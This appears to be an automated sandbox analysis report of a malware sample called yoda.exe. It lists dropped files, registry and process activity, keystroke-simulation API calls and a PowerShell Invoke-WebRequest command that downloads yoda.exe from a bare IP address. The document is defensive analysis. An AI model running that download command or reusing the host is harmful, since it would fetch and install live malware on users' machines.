Source: C:\Users\user\AppData\Local\Temp\yoda.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Google Drive.lnk.24.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.24.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.24.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.24.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.24.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.24.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

Code function: 11_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

11_2_00406328

Source: yoda.exe.9.dr

Static PE information: real checksum: 0xd304c should be: 0xd780d

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_00930DE6 push ecx; ret

21_2_00930DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\yoda.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com			Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009A26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		21_2_009A26DD
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0092FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		21_2_0092FC7C

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
